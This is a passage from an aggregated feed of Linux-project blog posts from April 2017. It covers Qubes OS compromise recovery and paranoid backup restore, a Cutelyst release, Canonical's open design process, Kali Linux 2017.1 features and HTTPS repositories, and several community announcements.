    [root@admin-ir user]# mount -o ro /dev/xvdi /mnt/personal/
  2. By using the Qubes secure file copy operation. Specifically, the user might copy the whole home directory to a new AppVM, and then analyze, verify and start using the (verified) data in a new, non-compromised AppVM:

    [user@personal ~]$ qvm-copy-to-vm admin-ir /home/user/
    [user@admin-ir ~]$ ll ~/QubesIncoming/personal/user/
    total 36
    drwxr-xr-x 2 user user 4096 Dec  2 21:22 Desktop
    drwxr-xr-x 2 user user 4096 Dec  2 21:22 Documents
    drwxr-xr-x 2 user user 4096 Dec  2 21:22 Downloads
    drwxr-xr-x 2 user user 4096 Dec  2 21:22 Music
    drwxr-xr-x 2 user user 4096 Dec  2 21:22 Pictures
    drwxr-xr-x 2 user user 4096 Dec  2 21:22 Public
    drwx------ 5 user user 4096 Mar  9 13:10 QubesIncoming
    drwxr-xr-x 2 user user 4096 Dec  2 21:22 Templates
    drwxr-xr-x 2 user user 4096 Dec  2 21:22 Videos
  3. By having “cleaning” scripts in the root filesystem (so that they can execute before the private image gets mounted/used) which, when activated, would sanitize, clean and/or remove most (all?) of the scripts in the home directory. Assuming such a cleaning script is effective (i.e. does not miss any place in the home directory which could be used to persist the attacker’s code), the user might just 1) upgrade the vulnerable software in the template, and 2) restart the AppVM. It’s worth stressing that, as the upgrading of the vulnerable software takes place in a TemplateVM (instead of the compromised AppVM), the attacker who previously exploited the vulnerability has no way of blocking the upgrade.

The first method described above, while most familiar to those accustomed to doing forensic analysis on traditional systems, is also the least secure, because it exposes the target AppVM (i.e. the one to which we mount the private image of the compromised AppVM) to potential attacks on its volume and filesystem parsing code.

The second method (Qubes inter-VM file copy) avoids this problem. But, of course, some method of sanitization or scanning of the files copied from the compromised machine will be needed (remember that the compromised AppVM might have sent whatever it felt like sending!). Some users might want to run more traditional, AV-like scanners, while others might want to employ approaches similar to e.g. one used by Qubes PDF converters. Perhaps in some scenarios even better approaches could be used, e.g. verifying code repositories by checking digital signatures.

The third method has not been officially merged into Qubes yet, and it is unclear how effective (complete) it could be in practice, but some discussions about it, accompanied by an early implementation, can be found on the mailing list.

Compromise recovery for an individual AppVM

Handling other system VMs compromises

Various other service VMs, such as USB and net VMs, should be much easier to recover. In most cases these do not require any significant user customisations or data (except perhaps for the saved list of Wi-Fi networks and their passphrases). In this case their recovery should be as easy as removing and recreating the VM in question.

One could go even further and imagine that all service VMs should be Disposable VMs, i.e. without any persistent storage (no private image). In this case full recovery would be achieved by simply restarting the VM. Thanks to the Admin API that is coming in Qubes 4.0, this approach might become easy to implement and could land in Qubes 4.1 or later.

Recovering from a full Qubes system compromise

So far we’ve been discussing situations when one or more Qubes VMs are compromised, and we have seen how Qubes’ compartmentalized architecture helps us to recover from such unpleasant situations reasonably well.

But occasionally we learn about bugs that allow an attacker to compromise the whole Qubes OS system. In the nearly 8 years of Qubes OS, there have been at least 4 such fatal bugs, and this justifies having a designated procedure for reacting to such cases. We look at this method below.

Introducing the “paranoid” backup restore mode

In order to provide a meaningful option for users to recover from a full Qubes system compromise, we have introduced “Paranoid Mode” for the backup restore procedure. (The mode is also known as “Plan B” mode.)

The idea behind this is very simple: the user makes a backup of a compromised machine (running the backup creation on this very machine), then restores it on a newly installed, clean Qubes system.

The catch is that this special mode of backup restoration must assume that the backup material might have been maliciously prepared in order to exploit the backup restoring code and attempt to take over the new system.

Naturally, backup encryption and HMAC-based integrity protection become meaningless in this case, as the attacker who has compromised the original system on which the backup was created might have been able to get her malicious backup content properly authenticated with the valid user passphrase. We discuss below how we made our backup restoration code (reasonably) resistant to such attacks.
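To see why keyed integrity protection cannot help here, consider a toy model of the scheme (a hypothetical simplification, not Qubes’ actual backup format): anyone who knows the passphrase-derived key, including an attacker who captured it on the compromised machine, can produce a tag that verifies perfectly.

```python
import hashlib
import hmac

def integrity_tag(passphrase: bytes, payload: bytes) -> bytes:
    # Toy stand-in for the backup's integrity protection: an HMAC
    # keyed with (a derivation of) the user's passphrase.
    return hmac.new(passphrase, payload, hashlib.sha256).digest()

def verifies(passphrase: bytes, payload: bytes, tag: bytes) -> bool:
    return hmac.compare_digest(integrity_tag(passphrase, payload), tag)

passphrase = b"user backup passphrase"

honest_backup = b"qubes.xml and VM images ..."
good_tag = integrity_tag(passphrase, honest_backup)

# The attacker who compromised the source machine learned the
# passphrase, so a tampered payload authenticates just as well.
evil_backup = b"maliciously crafted qubes.xml ..."
evil_tag = integrity_tag(passphrase, evil_backup)
```

The HMAC still protects against tampering by third parties who never saw the passphrase, which is why it remains useful for the normal (non-paranoid) restore path.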

Now, without further ado, a quick sample of how this new mode is used in practice:

[user@dom0 ~]$ qvm-backup-restore --help
Usage: qvm-backup-restore [options] <backup-dir> [vms-to-be-restored ...]

  -d APPVM, --dest-vm=APPVM
                        Specify VM containing the backup to be restored
  -e, --encrypted	The backup is encrypted
  -p PASS_FILE, --passphrase-file=PASS_FILE
                        Read passphrase from file, or use '-' to read from
  -z, --compressed	The backup is compressed
  --paranoid-mode, --plan-b
                        Treat the backup as untrusted, don't restore things
                        potentially compromising security, even when properly
                        authenticated. See man page for details.

[user@dom0 ~]$ qvm-backup-restore --paranoid-mode --ignore-missing -d sys-usb /media/disk/backup.bin
Please enter the passphrase to verify and (if encrypted) decrypt the backup:
Checking backup content...
Extracting data: 1.0 MiB to restore
paranoid-mode: not restoring dom0 home

The following VMs are included in the backup:

                       name |  type |            template | updbl |         netvm |  label |
                 {test-net} |   Net |           fedora-24 |       |           n/a |    red | <-- Original template was 'fedora-23'
      [test-template-clone] |   Tpl |                 n/a |   Yes | *sys-firewall |  black |
          test-standalonevm |   App |                 n/a |   Yes | *sys-firewall |   blue |
                  test-work |   App |           fedora-24 |       |      test-net |  green | <-- Original template was 'fedora-23'
           {test-testproxy} | Proxy |           fedora-24 |       |             - | yellow | <-- Original template was 'fedora-23'
 test-custom-template-appvm |   App | test-template-clone |       | *sys-firewall |  green |
               test-testhvm |   HVM |                 n/a |   Yes | *sys-firewall | orange |
    test-template-based-hvm |   HVM |    test-hvmtemplate |       | *sys-firewall |    red |
         [test-hvmtemplate] |   Tpl |                 n/a |   Yes | *sys-firewall |  green |

The above VMs will be copied and added to your system.
Existing VMs will NOT be removed.
Do you want to proceed? [y/N] y
-> Done. Please install updates for all the restored templates.
-> Done.
[user@dom0 ~]$

After the backup restoration we end up with a fresh system that consists of:

  1. a clean dom0, hypervisor, and the default system/service VMs,

  2. some number of potentially compromised VMs (those restored from the untrusted system), and

  3. some number of clean, non-compromised AppVMs.

The user can immediately start using any of the AppVMs, even the compromised ones, without endangering any other VMs.

Overview of Qubes system compromise recovery

However, a few things will not get restored when running in paranoid mode, and these include:

  • Any dom0 modifications, such as the wallpaper and other desktop environment customizations (it’s impossible to sanitize and securely restore these, but they should be relatively easy to recreate with “a few clicks”),

  • qrexec policies and firewall rules (what good would these policies be if they came from a compromised system anyway?), and

  • all non-basic properties of the restored VMs, such as PCI device assignments.

It should be clear that any attempt to restore any of the above might easily jeopardize the whole idea of the paranoid restoration procedure.

Qubes OS vs conventional systems?

It’s worth stressing the difference that the Qubes architecture makes here. In the case of a traditional monolithic OS, it is, of course, also possible to migrate to a newly installed, clean system. But users of these systems face two challenges:

  1. First, in order to copy the user data from the old, compromised system, one needs to somehow attach some kind of mass storage device to the new, clean system. Typically this would be a USB disk, or a directly-connected SATA-like disk. But this action exposes the clean system to a rather significant attack vector coming from 1) the malicious USB device, 2) malformed partitions or other volume metadata, and 3) malformed filesystem metadata. All these attacks would require a bug in the clean system’s USB, storage, or filesystem parsing stack, of course. But these might be completely different bugs than the ones we suspect the attacker used to infect the first system (as a reminder: we perform all these recovery procedures because we learned about some fatal bug in some critical software, e.g. a Web browser for a monolithic system, or Xen for Qubes).

  2. But even if we neglect the potential attacks discussed in the previous point, we still face a very uncomfortable situation: perhaps we have just successfully transferred all the data from the old system, but how can we securely use it now? If we “click-open” any of the files, we risk compromising our freshly installed system, for the attacker might have modified any or all of our files after the compromise. This would bring us back to the point where we started. A traditional solution would be to restore from an earlier, before-the-compromise-happened backup. Only that, as discussed above, we often lack good tools to determine when exactly the compromise happened. Not to mention that we would need to sacrifice all our recent work when implementing this strategy.

The Qubes mechanism described in this article has been designed to prevent any of these scenarios.

Under-the-hood of the backup restore “paranoid mode”

So, how have we designed and implemented this paranoid backup restore mode in Qubes OS? To understand our design decisions, as well as the current limitations, it is helpful to realize that we want to avoid attacks coming at three different levels of abstraction:

  0. System-level attacks (e.g. malicious USB, malformed filesystem metadata)
  1. Backup parsing-level attacks (e.g. on the XML parser for the qubes.xml file)
  2. Backup interpretation-level (“semantic”) attacks

The Qubes architecture was designed to prevent level 0 attacks long before we decided to tackle the problem of malicious backups. This is achieved both through careful compartmentalization and through the actual architecture of the backup system, which assumes that whichever domain (VM) provides the backup should not be trusted.

The level 1 attacks mentioned above are more problematic. The primary attack surface in the Qubes backup restore procedure is the parsing of the qubes.xml file that is part of the backup and which contains crucial information about the VMs being restored (which template they are based on, which network VMs they should be connected to, etc.). In the case of normal (i.e. non-paranoid-mode) backup restoration, even though the backup file is served from an untrusted entity (e.g. a usbvm), the attacker cannot control the qubes.xml file, because the whole backup is cryptographically authenticated. Unfortunately, in the scenario we’re considering here, this protection no longer works, as explained above.

In order to properly defend against attacks on the XML parser in the backup restoring code, we need to sandbox the code which does the actual parsing. Yet, it is somewhat problematic how such sandboxed code could still perform its stated goal of creating the actual restored VMs. Luckily, the new Admin (aka Mgmt) API, which we have introduced in Qubes 4.0, is an ideal mechanism for this job.
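The idea of confining the parser can be sketched in miniature by doing the parsing in a throwaway child process and passing back only plain data structures. This is a loose analogy for running the parser in a Disposable VM, not Qubes’ actual implementation; all names here are hypothetical, and the sketch assumes a Linux fork start method:

```python
import multiprocessing
import xml.etree.ElementTree as ET

# Use fork explicitly; this sketch is Linux-oriented, like Qubes itself.
_ctx = multiprocessing.get_context("fork")

def _parse_worker(xml_text, out_queue):
    # Runs in a disposable child process: if the XML parser is exploited,
    # only this process is affected; the parent receives plain dicts.
    vms = [dict(vm.attrib) for vm in ET.fromstring(xml_text).iter("vm")]
    out_queue.put(vms)

def parse_untrusted_vm_list(xml_text):
    out_queue = _ctx.Queue()
    proc = _ctx.Process(target=_parse_worker, args=(xml_text, out_queue))
    proc.start()
    try:
        # A crashed or hung parser must not hang (or crash) the caller.
        vms = out_queue.get(timeout=30)
    except Exception:
        proc.terminate()
        raise ValueError("untrusted backup metadata failed to parse")
    finally:
        proc.join()
    return vms
```

In Qubes 4.0 the isolation boundary is a whole VM talking to dom0 over qrexec, which is a far stronger barrier than a child process, but the data-flow shape is the same: untrusted bytes in, minimal vetted structure out.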

Unfortunately this API is not available on Qubes 3.2, which means we cannot easily sandbox the backup parsing code there. In this respect we need to trust Python’s XML parser implementation to be correct and not exploitable.

Finally, there is level 2 of potential attacks. These would exploit potential semantic vulnerabilities in backup restoration, such as injecting a malformed property name for one of the to-be-restored VMs in such a way that, when actually used later by the Qubes core code, it might result in the attacker’s code execution. For example, some properties are used to build paths (e.g. the kernel name for PVMs), or are perhaps passed to eval()-like functions.

In order to prevent such logic vulnerabilities, we have decided to write from scratch special code (SafeQubesVmCollection()) which parses the backup and creates VMs from it. The difference which makes this code special is that it only takes into account some minimal set of properties, i.e. those which we consider safe (for example it ignores PCI device assignments, doesn’t restore firewall rules, etc). Additionally it skips dom0’s home directory and implements other limitations, as already mentioned earlier.
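A minimal sketch of the “safe subset” idea might look like the following. The property names and limits here are hypothetical; in Qubes the real logic lives in the special-purpose SafeQubesVmCollection() code:

```python
# Hypothetical whitelist of VM properties considered safe to interpret.
SAFE_VM_PROPERTIES = {"name", "type", "template", "netvm", "label"}

def sanitize_vm_properties(untrusted_props):
    """Keep only whitelisted properties; silently drop everything else
    (PCI assignments, firewall rules, kernel paths, ...)."""
    safe = {}
    for key, value in untrusted_props.items():
        if key not in SAFE_VM_PROPERTIES:
            continue                  # e.g. 'pcidevs', 'firewall', 'kernel'
        if not isinstance(value, str) or not value.isprintable() or len(value) > 64:
            continue                  # also reject suspicious values
        safe[key] = value
    return safe
```

The key design choice is default-deny: unknown or oversized properties are dropped rather than escaped, so a new dangerous property added later cannot slip through.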

One nice thing about the upcoming Qubes 4.0 core stack and the Admin API is that it is trivial to take this safe backup restoration code and run it in a VM other than dom0, e.g. a Disposable VM. Then, assuming this VM is allowed to request the specific Admin API qrexec services (e.g. mgmt.vm.Create.*), everything will work as before. But, this time, the XML parser will run sandboxed within a VM, not in dom0 as in Qubes 3.2. This is illustrated in the diagram below.

Qubes Paranoid Mode implementation using Admin API in Qubes 4.0


Qubes architecture provides some unique benefits when recovering from one or more compromised AppVMs. These include: 1) an easy way to revert to a known good root filesystem for all template-based VMs, 2) the ability to safely migrate select data from a compromised AppVM to a new VM, 3) an easy way to recover from compromised system VMs, such as net and USB VMs, and 4) the ability to reliably upgrade vulnerable software within AppVMs by performing the upgrade in the template, instead of in the (compromised) AppVM, and then restarting the AppVM.

But even more spectacularly, the newly introduced “paranoid” backup restore mode offers a simple and generic way to recover from full system compromises.


I don’t get what all the fuss is about here. How is this different from any other OS?

Please (re-)read this section and summary section again.

For full system recovery, is it enough to reinstall Qubes OS still on the same hardware?

If our x86-based computers were more trustworthy, or at least more stateless, it would be enough to just reinstall the OS from scratch and stay on the same machine. Unfortunately, as of today, this might not be enough, because once the attacker has gained access to dom0/the hypervisor, she might be able to seriously compromise the underlying hardware and persist malware in such a way that it can survive further system reinstallations.

Wait, I thought Qubes OS offered protection against these pesky SMM/firmware malware?

Correct. Qubes OS, unlike most other systems, has been designed to keep all the malware away from interacting with the real, sensitive hardware, thus preventing various BIOS/firmware attacks (even if the attacker managed to compromise one or more of the VMs). However, once there is a fatal vulnerability in the core software that is used to implement Qubes security model, e.g. in the Xen hypervisor, then this protection no longer works. Sorry.

Alright, but in practice, do I really need to get a new machine?

Unfortunately no one can provide a good answer to that question. Each user must decide for themselves.

Wouldn’t it be easier to just use Disposable VMs for everything?

Unfortunately, “just use Disposable VMs” is not a magical solution to all security problems. In particular, whenever we want to persist user data/customisations/configuration across AppVM restarts (and we want to do that in the majority of cases), the use of DispVMs does not provide significant benefits over traditional AppVMs. In some special scenarios this might make sense, e.g. for the service VMs mentioned above. However, it doesn’t seem feasible to have a generic solution that could selectively copy back and sanitize user files before a DispVM shuts down, for later use of these files in another DispVM. And without sanitization, the solution becomes equivalent to… just using a standard AppVM.

26 April, 2017 12:00AM

April 25, 2017

hackergotchi for Tanglu developers

Tanglu developers

Cutelyst 1.6.0 released, to infinity and beyond!

Once 1.5.0 was released, I thought the next release would be a small one. It started with a bunch of bug fixes, and Simon Wilper made a contribution to Utils::Sql. Basically, once things get out to production you find bugs, so there were tons of fixes to the WSGI module.

Then the first preview of TechEmpower benchmarks round 14 came out, and Cutelyst performance was great, so I was planning to release 1.6.0 as it was. But the second preview fixed a bug where Cutelyst results had been scaled up, so our performance was worse than in round 13, and that didn’t make sense since we now had jemalloc and a few other improvements.

Actually, the results on the 40+HT-core server were close to those I got locally with a single thread.

Looking at the machine state, it was clear that only a few (9) workers were running at the same time, so I decided to create an experimental connection balancer for threads. Basically, the main thread accepts incoming connections and passes them evenly to each thread; this of course puts a new bottleneck on the main thread. Once the code was ready (which ended up improving other parts of the WSGI module), I became aware of SO_REUSEPORT.

The SO_REUSEPORT socket option is available on Linux >= 3.9 and, unlike on BSD, it implements a simple load balancer. This made my thread balancer obsolete, but the latter is still useful on non-Linux systems. This option is also nicer since it works for processes as well.
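A minimal demonstration of the option (a Python stand-in for what the C++ WSGI code would do; Linux >= 3.9 only): several sockets bind the same address and port, each having set SO_REUSEPORT first, and the kernel then distributes incoming connections between them.

```python
import socket

def make_listener(port):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    # Every socket sharing the port must set SO_REUSEPORT before bind();
    # the kernel then load-balances incoming connections between them.
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
    s.bind(("127.0.0.1", port))
    s.listen(16)
    return s

# One listener per worker thread/process, all bound to the same port.
first = make_listener(0)                  # port 0: let the kernel pick one
port = first.getsockname()[1]
workers = [first] + [make_listener(port) for _ in range(3)]
```

In a real server each of these sockets would be accept()ed on by a different worker thread or process, with no user-space hand-off needed.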

With 80 cores there’s still the chance that the OS scheduler puts most of your threads on the same cores, and maybe even moves them around under load. So an option for setting CPU affinity was also added; this allows each worker to be pinned to one or more cores evenly. It uses the same logic as uwsgi.
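The pinning logic can be sketched like so (a Python stand-in; `pin_workers_evenly` is a hypothetical helper, not Cutelyst code, and `os.sched_setaffinity` is Linux-only):

```python
import os

def pin_workers_evenly(worker_ids, cores):
    """Assign each worker a core round-robin, mirroring the evenly-pinned
    behaviour described above (hypothetical helper)."""
    cores = sorted(cores)
    return {wid: cores[i % len(cores)] for i, wid in enumerate(worker_ids)}

# Pin the current process to one of the cores it is already allowed on.
allowed = os.sched_getaffinity(0)
target = min(allowed)
os.sched_setaffinity(0, {target})
```

Each worker process would run the `sched_setaffinity` call with its own assigned core set at startup.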

Now that the WSGI module supported all these features, preview 3 of the benchmarks came out and the results were still terrible… further investigation revealed that a variable supposed to be set to the CPU core count was set to 8 instead of 80. I’m sure all this work did improve performance for servers with lots of cores, so in the end the wrong interpretation was good after all 🙂

Preview 4 came out and we are back to the top, I’ll do another post once it’s final.

The code name “to infinity and beyond” came about due to the scalability options this release got 😀

Last but not least, I did my best to get rid of Doxygen missing-documentation warnings.

Have fun https://github.com/cutelyst/cutelyst/archive/v1.6.0.tar.gz

25 April, 2017 08:09PM by dantti

hackergotchi for Ubuntu developers

Ubuntu developers

Canonical Design Team: Designing in the open

Over the past year, a change has emerged in the design team here at Canonical: we’ve started designing our websites and apps in public GitHub repositories, and therefore sharing the entire design process with the world.

One of the main things we wanted to improve was the design sign-off process, while also increasing visibility for developers of which design was the final one among numerous iterations and inconsistently labelled files and folders.

Here is the process we developed and have been using on multiple projects.

The process

Design work items are initiated by creating a GitHub issue on the design repository relating to the project. Each project consists of two repositories: one for the code base and another for designs. The work item issue contains a short descriptive title followed by a detailed description of the problem or feature.

Once the designer has created one or more designs to present, they upload them to the issue with a description. Each image is titled with a version number to help reference in subsequent comments.

Whenever the designer updates the GitHub issue everyone who is watching the project receives an email update. It is important for anyone interested or with a stake in the project to watch the design repositories that are relevant to them.

The designer can continue to iterate on the task safe in the knowledge that everyone can see the designs in their own time and provide feedback if needed. The feedback that comes in at this stage is welcomed, as early feedback is usually better than late.

As iterations of the design are created, the designer simply adds them to the existing issue with a comment of the changes they made and any feedback from any review meetings.

Table with actions design from MAAS project

When the design is finalised a pull request is created and linked to the GitHub issue, by adding “Fixes #111” (where #111 is the number of the original issue) to the pull request description. The pull request contains the final design in a folder structure that makes sense for the project.

Just like with code, the pull request is then approved by another designer or the person with the final say. This may seem like an extra step, but it allows another person to look through the issue and make sure the design completes the design goal. On smaller teams, this pull request can be approved by a stakeholder or developer.

Once the pull request is approved it can be merged. This will close and archive the issue and add the final design to the code section of the design repository.

That’s it!


If all designers and developers of a project subscribe to the design repository, they will be included in the iterative design process with plenty of email reminders. This increases the visibility of designs in progress to stakeholders, developers and other designers, allowing for wider feedback at all stages of the design process.

Another benefit of this process is having a full history of decisions made and the evolution of a design all contained within a single page.

If your project is open source, this process makes your designs available to your community or anyone that is interested in the product automatically. This means that anyone who wants to contribute to the project has access to all the information and assets as the team members.

The code section of the design repository becomes the home for all signed off designs. If a developer is ever unsure as to what something should look like, they can reference the relevant folder in the design repository and be confident that it is the latest design.

Canonical is largely a company of remote workers, and sometimes conversations are not documented, which means only some people are aware of the decisions made and the conversations behind them. This design process has helped with that issue, as designs and discussions are all in a single place, with clearly laid-out emails for every change, for anyone who may be interested.


This process has helped our team improve velocity and transparency. Is this something you’ve considered or have done in your own projects? Let us know in the comments, we’d love to hear of any way we can improve the process.

25 April, 2017 05:27PM

hackergotchi for Kali Linux

Kali Linux

Kali Linux 2017.1 Release

Finally, it’s here! We’re happy to announce the availability of the Kali Linux 2017.1 rolling release, which brings with it a bunch of exciting updates and features. As with all new releases, you have the common denominator of updated packages, an updated kernel that provides more and better hardware support, as well as a slew of updated tools – but this release has a few more surprises up its sleeve.

Support for RTL8812AU Wireless Card Injection

A while back, we received a feature request asking for the inclusion of drivers for RTL8812AU wireless chipsets. These drivers are not part of the standard Linux kernel, and have been modified to allow for injection. Why is this a big deal? This chipset supports 802.11ac, making this one of the first drivers to bring injection-related wireless attacks to this standard, and with companies such as ALFA making the AWUS036ACH wireless cards, we expect this card to be an arsenal favourite.

The driver can be installed using the following commands:

apt-get update
apt install realtek-rtl88xxau-dkms

Streamlined Support for CUDA GPU Cracking

Installing proprietary graphics drivers has always been a source of frustration in Kali. Fortunately, improvements in packaging have made this process seamless – allowing our users a streamlined experience with GPU cracking. Together with supported hardware, tools such as Hashcat and Pyrit can take full advantage of NVIDIA GPUs within Kali. For more information about this new feature, check out the related blog post and updated official documentation.

Amazon AWS and Microsoft Azure Availability (GPU Support)

Due to the increasing popularity of using cloud-based instances for password cracking, we decided to focus our efforts on streamlining Kali’s approach. We noticed that Amazon’s AWS P2-Series and Microsoft’s Azure NC-Series allow pass-through GPU support, so we made corresponding AWS and Azure images of Kali that support CUDA GPU cracking out of the box. For more information, check out the Cracking in the Cloud with CUDA GPUs post we released a few weeks back.

OpenVAS 9 Packaged in Kali Repositories

One of the most lacking tool categories in Kali (as well as the open-source arena at large) is a fully-fledged vulnerability scanner. We’ve recently packaged OpenVAS 9 (together with a multitude of dependencies) and can happily say that, in our opinion, the OpenVAS project has matured significantly. We still do not include OpenVAS in the default Kali release due to its large footprint, but OpenVAS can easily be downloaded and installed using the following commands:

apt-get update
apt install openvas

Kali Linux Revealed Book and Online Course

To those of you following our recent announcement regarding the Kali Linux Certified Professional program, we’re happy to say that we’re spot on schedule. The Kali Linux Revealed book will be available in early July, and the free online version will be available shortly after that. We’re really excited about both the book and the online course and are anxiously awaiting this release; it marks a real milestone for us as our project continues to grow and mature. To keep updated regarding the release of both the book and the online course, make sure to follow us on Twitter.

Kali Linux Revealed

Kali Linux at Black Hat Vegas 2017

This year, we are fortunate enough to debut our first official Kali Linux training at the Black Hat conference in Las Vegas, 2017. This in-depth, four-day course will focus on the Kali Linux platform itself (as opposed to the tools or penetration testing techniques) and help you understand and maximize your use of Kali from the ground up. In this four-day class, delivered by Mati Aharoni and Johnny Long, you will learn to become a Kali Linux ninja. We will also be delivering another Dojo event this year; more details about that to come at a later date.

Kali ISO Downloads, Virtual Machines and ARM Images

The Kali Rolling 2017.1 release can be downloaded via our official Kali Download page. If you missed it, our repositories have recently been updated to support HTTPS, as well as an HTTPS apt transport. This release, we have also updated our Kali Virtual Images and Kali ARM Images downloads. As usual, if you’ve got Kali already installed, all you need to do to be fully updated is:

apt update
apt dist-upgrade

We hope you enjoy this fine release!

25 April, 2017 04:35PM by muts

hackergotchi for Ubuntu developers

Ubuntu developers

Daniel Pocock: FSFE Fellowship Representative, OSCAL'17 and other upcoming events

The Free Software Foundation of Europe has just completed the process of electing a new fellowship representative to the General Assembly (GA) and I was surprised to find that out of seven very deserving candidates, members of the fellowship have selected me to represent them on the GA.

I'd like to thank all those who voted, the other candidates and Erik Albers for his efforts to administer this annual process.

Please consider becoming an FSFE fellow or donor

The FSFE runs on the support of both volunteers and financial donors, including organizations and individual members of the fellowship program. The fellowship program is not about money alone; it is an opportunity to become more aware of and involved in the debate about technology's impact on society, for better or worse. Developers, users and any other supporters of the organization's mission are welcome to join; here is the form. You don't need to be a fellow or pay any money to be an active part of the free software community, and FSFE events generally don't exclude non-members. Nonetheless, becoming a fellow gives you a stronger voice in processes such as this annual election.

Attending OSCAL'17, Tirana

During the election period, I promised to keep on doing the things I already do: volunteering, public speaking, mentoring, blogging and developing innovative new code. During May I hope to attend several events, including OSCAL'17 in Tirana, Albania on 13-14 May. I'll be running a workshop there on the Debian Hams blend and Software Defined Radio. Please come along and encourage other people you know in the region to consider attending.

What is your view on the Fellowship and FSFE structure?

Several candidates made comments about the Fellowship program and the way individual members and volunteers are involved in FSFE governance. This is not a new topic. Debate about this topic is very welcome and I would be particularly interested to hear any concerns or ideas for improvement that people may contribute. One of the best places to share these ideas would be through the FSFE's discussion list.

In any case, the fellowship representative cannot single-handedly overhaul the organization. I hope to be a constructive part of the team, and that whenever my term comes to an end, the organization and the free software community in general will be stronger and happier in some way.

25 April, 2017 12:57PM

The Fridge: Ubuntu Weekly Newsletter Issue 505

Welcome to the Ubuntu Weekly Newsletter. This is issue #505 for the weeks April 10 – 23, 2017, and the full version is available here.

In this issue we cover:

This issue of the Ubuntu Weekly Newsletter is brought to you by:

  • Simon Quigley
  • Chris Guiver
  • Jim Connett
  • And many others

If you have a story idea for the Weekly Newsletter, join the Ubuntu News Team mailing list and submit it. Ideas can also be added to the wiki!

Except where otherwise noted, content in this issue is licensed under a Creative Commons Attribution-ShareAlike 3.0 License.

25 April, 2017 02:31AM

April 24, 2017

hackergotchi for ArcheOS

ArcheOS


ArcheOS Hypatia Virtual Globe: Cesium

Hi all,
I am starting here a series of short posts to show some of the features of the main software selected for ArcheOS Hypatia, trying to explain the reasons for these choices. The first category I'll deal with is Virtual Globes. Among the many available FLOSS options, one of the applications that meets the needs of archaeology is certainly Cesium. This short video shows its capability to import complex geolocated 3D models, which is a very important possibility for archaeologists. In this example I imported into Cesium the 3D model (done with Structure from Motion) of a small boat which lies on the bottom of an alpine lake (more info in this post).

Soon I'll post other short videos to show other features of Cesium. Have a nice evening!

24 April, 2017 08:52PM by Luca Bezzi (noreply@blogger.com)

hackergotchi for Kali Linux

Kali Linux

Kali Linux repository HTTPS support

A couple of weeks back we added more HTTPS support to our Kali infrastructure, and wanted to give our users some guidance and point out what’s new. While our Kali Linux download page (and shasums) has always been served via HTTPS, our mirror redirector has not. Now that we generate weekly images, secure access to the mirror redirector has become crucial.


This is our Kali Image Mirror Redirector. This server accepts your download requests from our official download page, and then serves your requested file from the geographically closest mirror. This is also the download point for our Kali Weekly builds – now with fresh and shiny HTTPS support. Hitting this redirector via HTTPS will redirect your request to an SSL enabled download server, while an unencrypted HTTP request will redirect to an HTTP enabled mirror. Where’s the catch? Not all donated mirrors support HTTPS, so choosing this transport may result in slower download speeds. Should downloading a Kali image over HTTP be a security concern? Not if you GPG verify your downloaded image.
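The verification workflow itself is quick. The sketch below demonstrates only the checksum half, on a stand-in file with made-up names; for a real image you would download the SHA256SUMS and SHA256SUMS.gpg files from the official download page and first check the checksum file's signature with gpg --verify against the Kali signing key before trusting any hash in it.

```shell
# Sketch of the checksum-verification step using a stand-in file and
# made-up filenames, not a real Kali image. For a real download, first
# verify SHA256SUMS itself with gpg --verify before trusting it.
printf 'pretend-iso-contents' > kali-demo.iso
sha256sum kali-demo.iso > SHA256SUMS.demo
# Prints "kali-demo.iso: OK" if the file matches its recorded hash
sha256sum -c SHA256SUMS.demo
```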


As a byproduct of enabling HTTPS on cdimage.kali.org, we now also support apt HTTPS transports. This means that our actual Kali package repositories can support HTTPS – resulting in encrypted Kali updates and upgrades. Surprisingly, this does not add much security to the update / upgrade process (read here if you’re wondering why) – however it *does* add an extra layer of security, so we figured, “why not?”. To enable the apt HTTPS transport, first make sure the apt-transport-https package is installed (it’s installed by default in our weekly images and upcoming releases) and enable the HTTPS transport in your sources.list file as shown below:

root@kali:~# apt-get install apt-transport-https
root@kali:~# cat /etc/apt/sources.list
deb https://http.kali.org/kali kali-rolling main non-free contrib
# deb-src https://http.kali.org/kali kali-rolling main non-free contrib

Now any update or upgrade operation performed against our mirrors will be HTTPS enabled:

root@kali:~# apt-get update
Hit:1 https://archive-3.kali.org/kali kali-rolling InRelease
Reading package lists... Done
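If an existing install still has plain-HTTP entries, switching them over is a one-line substitution. The sketch below runs against a scratch copy rather than the live /etc/apt/sources.list, so the filename is a stand-in:

```shell
# Demonstrate the http-to-https switch on a scratch copy of the
# sources list; edit /etc/apt/sources.list itself on a real system.
printf 'deb http://http.kali.org/kali kali-rolling main non-free contrib\n' > sources.list.demo
sed -i 's|deb http://|deb https://|' sources.list.demo
cat sources.list.demo
```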

As not all donated mirrors come with HTTPS support, shifting to the HTTPS transport may result in a less optimized mirror being selected for you, resulting in slower download speeds. As moving to an apt HTTPS transport does not provide much extra security, do so only if you feel you must!

24 April, 2017 02:29PM by muts

hackergotchi for Ubuntu developers

Ubuntu developers

Ubuntu Insights: Canonical joins EdgeX Foundry to help unify IoT edge computing

Fragmentation is the nature of the beast in the IoT space, with a variety of non-interoperable protocols, devices and vendors, the natural result of years of evolution, especially in the industrial space. Traditional standardisation processes and proprietary implementations have been the norm, but the slow pace of their progress makes them a liability for the burgeoning future of IoT. For these reasons, many organisations are taking action to change the legacy IoT mode of operations in the quest for accelerated innovation and improved efficiencies.

To aid this progress, today, the Linux Foundation has announced a new open source software project called the EdgeX Foundry. The aim is to create an open framework and unify the marketplace to build an ecosystem of companies offering plug and play components on IoT edge solutions. The Linux Foundation has gathered over 50 companies to be the founding members of this project and Canonical is proud to be one of these.

Here at Canonical, we have been pushing for open source approaches to IoT fragmentation. Last year’s introduction of snaps is one example of this – the creation of a universal Linux packaging format to make it easy for developers to manage the distribution of their applications across devices, distros and releases. They are also safer to run and faster to install. Looking forward, we want to see snaps as the default format across the board to work on any distribution or device from IoT to desktops and beyond.

Just like snaps, the EdgeX framework is designed to run on any operating system or hardware. It can quickly and easily deliver interoperability between connected devices, applications and services across a wide range of use cases. Fellow founding member, Dell, is seeding EdgeX Foundry with its FUSE source code base consisting of more than a dozen microservices and over 125,000 lines of code.

